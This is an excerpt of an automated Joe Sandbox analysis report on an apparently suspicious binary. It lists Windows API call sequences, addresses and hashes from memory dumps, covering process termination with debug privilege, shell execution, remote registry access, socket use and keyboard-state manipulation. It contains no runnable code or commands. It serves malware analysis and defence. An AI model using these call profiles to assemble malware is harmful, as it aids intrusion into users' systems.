                                                          • Opcode Fuzzy Hash: 54fca919ba7505cecabb9eb6305e8aafab3b19bcdc8b47932dcd038bbe1c6c09
                                                          • Instruction Fuzzy Hash: 51918271A20219AFDF24DFA5C888F9EB7B8EF45710F10865DF515AB280D7709994CFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D7449
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 002D745D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D7477
                                                          • _wcscat.LIBCMT ref: 002D74D2
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 002D74E9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D7517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 5ad9552cbd8201e44f438990dfe49ec52f3c571f639ee3d88a98c2a6e8b69c57
                                                          • Instruction ID: cb7fe94956c56a70c767f67a9e95cc2619df4d546632a999c9148020024e1a46
                                                          • Opcode Fuzzy Hash: 5ad9552cbd8201e44f438990dfe49ec52f3c571f639ee3d88a98c2a6e8b69c57
                                                          • Instruction Fuzzy Hash: FA41D370954349AFDB229F64CC85BEE77B8EF08350F10442AF984A72D1E3759D94CB60
                                                          APIs
                                                            • Part of subcall function 002B4148: CreateToolhelp32Snapshot.KERNEL32 ref: 002B416D
                                                            • Part of subcall function 002B4148: Process32FirstW.KERNEL32(00000000,?), ref: 002B417B
                                                            • Part of subcall function 002B4148: CloseHandle.KERNEL32(00000000), ref: 002B4245
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CF08D
                                                          • GetLastError.KERNEL32 ref: 002CF0A0
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CF0CF
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 002CF14C
                                                          • GetLastError.KERNEL32(00000000), ref: 002CF157
                                                          • CloseHandle.KERNEL32(00000000), ref: 002CF18C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: 6cd07174bdca894127a6ae4c56617495e61ec87ae325d546aec5aa16f14d43b9
                                                          • Instruction ID: 52284e97d3371ea092860cbd7472622e32942497487619d821f2f8f129b69cbb
                                                          • Opcode Fuzzy Hash: 6cd07174bdca894127a6ae4c56617495e61ec87ae325d546aec5aa16f14d43b9
                                                          • Instruction Fuzzy Hash: 8741CD312202019FDB15EF24DDD9F6DB7A1AF80714F08816DF80A5F292CBB4A965CF95
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B4802
                                                          • LoadStringW.USER32(00000000), ref: 002B4809
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002B481F
                                                          • LoadStringW.USER32(00000000), ref: 002B4826
                                                          • _wprintf.LIBCMT ref: 002B484C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B486A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 002B4847
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: 33959a5097ac827dff5dd564a7163fa023eb75e7dcfe772b8769f15b7b3ed66e
                                                          • Instruction ID: f0f656195b907f85089fd14d32a9eae28be9ca4b61bb6eab95c1bb755126e2f5
                                                          • Opcode Fuzzy Hash: 33959a5097ac827dff5dd564a7163fa023eb75e7dcfe772b8769f15b7b3ed66e
                                                          • Instruction Fuzzy Hash: 7D0144F29502487FE721AB94ADC9EF6736CD708300F400595B749DA041E6B45E954F75
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • GetSystemMetrics.USER32(0000000F), ref: 002DDB42
                                                          • GetSystemMetrics.USER32(0000000F), ref: 002DDB62
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DDD9D
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DDDBB
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DDDDC
                                                          • ShowWindow.USER32(00000003,00000000), ref: 002DDDFB
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 002DDE20
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 002DDE43
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 98be6d9a5095d60e7d803fffd2faffcea872e19cbf05eb7a11e325160aad3d55
                                                          • Instruction ID: 313bc16d18120063971e914efa69736668b12749b81a8acd21d4a982aff2f144
                                                          • Opcode Fuzzy Hash: 98be6d9a5095d60e7d803fffd2faffcea872e19cbf05eb7a11e325160aad3d55
                                                          • Instruction Fuzzy Hash: A7B16931610616EBDF14CF69C9C97BD7BB1BF04705F08806AEC489E295D774ADA0CBA0
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D044E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3479070676-0
                                                          • Opcode ID: 3283224d2d45e1dae3d7a37d8255461088fee6b46c031c308454e0b5b6bfe191
                                                          • Instruction ID: da468526f8c09b299c99e20f17a3dc7739c60914e36c0f27614be328794edcfb
                                                          • Opcode Fuzzy Hash: 3283224d2d45e1dae3d7a37d8255461088fee6b46c031c308454e0b5b6bfe191
                                                          • Instruction Fuzzy Hash: 6CA16C302242019FCB10EF64D885F2EB7E5AF84314F14891EF9959B2A1DB71EDA5CF86
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000), ref: 00252E9F
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000,000000FF), ref: 00252EE7
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000), ref: 0028C55B
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000), ref: 0028C5C7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 041dea2124c78b1cd4d397dd43035ec49c60c2c1b76012f60221709b0f16fcc8
                                                          • Instruction ID: 84426757fed570646489a2c27dc19e743976c1dca614f4fda2c2e18a1ca2e9e9
                                                          • Opcode Fuzzy Hash: 041dea2124c78b1cd4d397dd43035ec49c60c2c1b76012f60221709b0f16fcc8
                                                          • Instruction Fuzzy Hash: 68412A30634681DACB359F2898CE76A7BD2AB87302F64840DEC47565E0C7B4B8BDD724
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 002B7698
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002B76CF
                                                          • EnterCriticalSection.KERNEL32(?), ref: 002B76EB
                                                          • _memmove.LIBCMT ref: 002B7739
                                                          • _memmove.LIBCMT ref: 002B7756
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 002B7765
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002B777A
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7799
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: 91ed14eef53d8a73cfa34b24451407a39d130b2ef079f7672d266a2f0877beaf
                                                          • Instruction ID: ddb82f0830d0fc19b73cc77673dcd0443c76369534ff3424f6d399838a05f8c6
                                                          • Opcode Fuzzy Hash: 91ed14eef53d8a73cfa34b24451407a39d130b2ef079f7672d266a2f0877beaf
                                                          • Instruction Fuzzy Hash: F2318131914105EBDB10EF94DCC9EAEB7B8EF85340B1480A5FD08AF256DB709E65DBA0
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 002D6810
                                                          • GetDC.USER32(00000000), ref: 002D6818
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D6823
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 002D682F
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D686B
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D687C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D964F,?,?,000000FF,00000000,?,000000FF,?), ref: 002D68B6
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D68D6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: a32d6f2515da3305c8cbcc95864d761831a0b2b88d909ea7ca929dfa9dcf3884
                                                          • Instruction ID: ba8c117886a9517f501e61d3200ec37830f38aacf3b7854943044dc725be2ea4
                                                          • Opcode Fuzzy Hash: a32d6f2515da3305c8cbcc95864d761831a0b2b88d909ea7ca929dfa9dcf3884
                                                          • Instruction Fuzzy Hash: D4316972141250AFEB118F50DC8AFAA3BADEB49761F040061FE089E291C6B59C92CBB4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 3701954d72408124727d26331efca9ffe413c99a2326ad5023953d88a01c284f
                                                          • Instruction ID: bb1f70bcac78bd529c5ec01964c406074ce2b4bacf2533a37a921f57e57448b5
                                                          • Opcode Fuzzy Hash: 3701954d72408124727d26331efca9ffe413c99a2326ad5023953d88a01c284f
                                                          • Instruction Fuzzy Hash: 332107726702067BD214B9158D46FBB736CAE13744B344021FD0AA7342EF60DE31CAA1
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                          • _wcstok.LIBCMT ref: 002BF2D7
                                                          • _wcscpy.LIBCMT ref: 002BF366
                                                          • _memset.LIBCMT ref: 002BF399
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 2dc3214cd864196cb0e7adacf34249ce7802ca11e938287c4e8bfca575e5d461
                                                          • Instruction ID: d37fe78e9d99aa1517faca0c7c5e1171f5e07effe42d88ebcdea36d92f46911b
                                                          • Opcode Fuzzy Hash: 2dc3214cd864196cb0e7adacf34249ce7802ca11e938287c4e8bfca575e5d461
                                                          • Instruction Fuzzy Hash: D4C1CF715247419FC764EF24C991AAEB7E4BF84354F04492DF899872A2DB30ECA5CF82
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C72EB
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C730C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C731F
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 002C73D5
                                                          • inet_ntoa.WSOCK32(?), ref: 002C7392
                                                            • Part of subcall function 002AB4EA: _strlen.LIBCMT ref: 002AB4F4
                                                            • Part of subcall function 002AB4EA: _memmove.LIBCMT ref: 002AB516
                                                          • _strlen.LIBCMT ref: 002C742F
                                                          • _memmove.LIBCMT ref: 002C7498
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          • Opcode ID: a86fc09da585b673330548dd4006d52eb67907d483fd58082e12fcc8053ab455
                                                          • Instruction ID: d512f282bb8c869f7e54ce9e25aaca7be54493659d891e4237b97424e58f5d2d
                                                          • Opcode Fuzzy Hash: a86fc09da585b673330548dd4006d52eb67907d483fd58082e12fcc8053ab455
                                                          • Instruction Fuzzy Hash: 4581D071128200ABC724EF24DC85F6AB7B8EF84714F14861CF9569B292DB70ED65CF92
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb9f9fb5a94d86227984e8c8157eb5184efc3ff16557e048308a8dc63d2a60ec
                                                          • Instruction ID: db66d1441cd71243b20bb8e8e41ccb59f85fdc6f55064cd136bec4bfca6de5d9
                                                          • Opcode Fuzzy Hash: eb9f9fb5a94d86227984e8c8157eb5184efc3ff16557e048308a8dc63d2a60ec
                                                          • Instruction Fuzzy Hash: 8471AD3491010AFFDB14DF58CC88ABEBB79FF86315F148149F815AA251C7309A65CF64
                                                          APIs
                                                          • IsWindow.USER32(016F5700), ref: 002DBA5D
                                                          • IsWindowEnabled.USER32(016F5700), ref: 002DBA69
                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002DBB4D
                                                          • SendMessageW.USER32(016F5700,000000B0,?,?), ref: 002DBB84
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 002DBBC1
                                                          • GetWindowLongW.USER32(016F5700,000000EC), ref: 002DBBE3
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002DBBFB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: f4befaa27b5e60b8444dd6d19177a20f74c01dc267909f966c6917ac9ee8c3bd
                                                          • Instruction ID: e1bbc970628d8200ebb4baf229329ea34f2079663fb6faa7fd38fbf579fcc2f6
                                                          • Opcode Fuzzy Hash: f4befaa27b5e60b8444dd6d19177a20f74c01dc267909f966c6917ac9ee8c3bd
                                                          • Instruction Fuzzy Hash: 2671AD34A24206EFDB269F54C8E8FBAB7B9EB49300F15405BE94597391CB71AC61CB60
                                                          APIs
                                                          • _memset.LIBCMT ref: 002CFB31
                                                          • _memset.LIBCMT ref: 002CFBFA
                                                          • ShellExecuteExW.SHELL32(?), ref: 002CFC3F
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                          • GetProcessId.KERNEL32(00000000), ref: 002CFCB6
                                                          • CloseHandle.KERNEL32(00000000), ref: 002CFCE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: 515948770bc5711769d4f26abf65c154d5dfa3e24ee69cb8b6b31b833b08990e
                                                          • Instruction ID: d27da84a051645839df0fb46f87a9e9556e1c7e4e66c877a3e081cbdb6733e5b
                                                          • Opcode Fuzzy Hash: 515948770bc5711769d4f26abf65c154d5dfa3e24ee69cb8b6b31b833b08990e
                                                          • Instruction Fuzzy Hash: 4161AE75A206199FCB14EF54C590AADF7F5FF08314B14856AE80AAB351CB30AEA1CF94
                                                          APIs
                                                          • GetParent.USER32(?), ref: 002B178B
                                                          • GetKeyboardState.USER32(?), ref: 002B17A0
                                                          • SetKeyboardState.USER32(?), ref: 002B1801
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 002B182F
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 002B184E
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 002B1894
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002B18B7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 5e0ad034a8efa617df81043ee675335bbf550a589eafcb2dc4fc0eff75d3acf4
                                                          • Instruction ID: 50fa28e80d5db28a7528c0ada322788b8eeadffd85e563064409a84f2d1bf0d5
                                                          • Opcode Fuzzy Hash: 5e0ad034a8efa617df81043ee675335bbf550a589eafcb2dc4fc0eff75d3acf4
                                                          • Instruction Fuzzy Hash: B55105609247C63DFB324A24CC65BF6BEE96B06780F488589E0D5468C2C7D4ACF4D750
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 002B15A4
                                                          • GetKeyboardState.USER32(?), ref: 002B15B9
                                                          • SetKeyboardState.USER32(?), ref: 002B161A
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002B1646
